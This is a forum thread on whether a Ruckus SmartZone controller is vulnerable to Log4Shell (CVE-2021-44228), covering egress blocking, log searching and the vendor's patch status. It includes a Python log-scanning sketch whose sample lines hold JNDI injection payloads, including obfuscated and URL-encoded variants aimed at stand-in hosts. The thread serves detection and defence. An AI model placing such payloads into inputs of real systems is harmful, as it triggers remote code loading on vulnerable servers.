
[CVE-2021-44228] Apache Log4j2 RCE

dawoon_lee
New Contributor II

Hello.

Our customer is running a Ruckus SmartZone (sz-100) controller.
The version of the controller is 5.1.1.0.598.


The customer asked if the SmartZone has the following security vulnerability.

** Vulnerability: [CVE-2021-44228] Apache Log4j2 RCE

Thank you for your valuable answers to the above questions.

91 REPLIES 91

Thanks @allan_grohe. That's good to know. Especially for this forum where everyone can read about it.

diego_garcia_de
Contributor III

Hello everyone concerned,

We've seen some recommendations to block outgoing connections from SmartZone as a possible mitigation / protection (since the blocked outgoing connection would prevent the malicious LDAP download from occurring).

Keep in mind that a port other than the standard LDAP could be included in the exploit URL, so it's not enough to just block outgoing LDAP traffic.

Is there any way that Ruckus can provide a list of "expected" IPs that the SmartZone would connect to in normal operation?

Of course, any proxied RADIUS connections, FTP server for logging or backup, etc. would be entirely up to me, the administrator, to add.

But I have now added a block-and-log rule and I'm seeing outgoing connections to Akamai from SmartZone, in particular to IPs 23.205.105.175 and 23.205.105.155

bjarne_goldau
New Contributor

I just want to add that you can check if there were attacks by searching the "web-critical" log for "jndi:ldap".
Does anybody know if the control interface is vulnerable too?
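A sketch of the log search suggested above, as an added example that is not part of the original posts or Ruckus tooling: it goes beyond a literal "jndi:ldap" match by URL-decoding each line, unwrapping nested lower/upper lookups, and reporting the scheme, host and port of every JNDI lookup, since the thread notes that the port need not be the standard LDAP one. The log lines are constructed (the real "web-critical" format is not shown in the thread) and the function names are hypothetical.

```python
import re
from urllib.parse import unquote

# Constructed sample lines; the real "web-critical" log format is not shown in the thread.
SAMPLE_LOG = [
    "2021-12-12 10:01:02 WARN login failed user=admin",
    "2021-12-12 10:01:05 WARN login failed user=${jndi:ldap://host.example.invalid:1389/a}",
    "2021-12-12 10:02:11 WARN bad header ua=${${lower:j}ndi:${lower:l}dap://192.0.2.10/x}",
    "2021-12-12 10:03:40 WARN path=/%24%7Bjndi:rmi://198.51.100.7:443/o%7D",
]

# Ports used when the lookup URL names none.
DEFAULT_PORT = {"ldap": 389, "ldaps": 636, "rmi": 1099, "dns": 53}

# Innermost ${lower:x} / ${upper:x} lookups, which Log4j resolves to x before
# the outer lookup is evaluated. Not an exhaustive list of nesting forms.
_WRAPPER = re.compile(r"\$\{(?:lower|upper):([^${}]*)\}", re.I)
_JNDI = re.compile(r"\$\{jndi:(\w+)://([^/:}\s]+)(?::(\d+))?", re.I)


def normalize(line):
    """URL-decode the line and unwrap nested lower/upper lookups."""
    line = unquote(line)
    prev = None
    while prev != line:  # repeat until no wrapper is left
        prev = line
        line = _WRAPPER.sub(lambda m: m.group(1), line)
    return line


def find_jndi(lines):
    """Return (line_no, scheme, host, port) for every JNDI lookup found."""
    hits = []
    for n, raw in enumerate(lines, 1):
        for m in _JNDI.finditer(normalize(raw)):
            scheme = m.group(1).lower()
            port = int(m.group(3)) if m.group(3) else DEFAULT_PORT.get(scheme)
            hits.append((n, scheme, m.group(2), port))
    return hits


if __name__ == "__main__":
    for hit in find_jndi(SAMPLE_LOG):
        print("line %d: %s -> %s:%s" % hit)
```

The reported host and port pairs can be compared with the firewall's block-and-log entries for the controller's outgoing connections.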

@bjarne_goldau

Management interface would be the most likely vulnerable since a user can input a specific string from UI/Public API to trigger this vulnerability, but IMHO any way that an attacker can input a specific string into the logger directly or indirectly via any interface will affect SZ. On the fix (ksp patch), we are currently completing the testing cycle to make sure there is no regression, and once completed it will be out.

Best Regards

Vineet

Hi Vineet, Management interface is vulnerable, I tried that myself. I am asking about the control interface where the access points connect to. Do you have any information on that?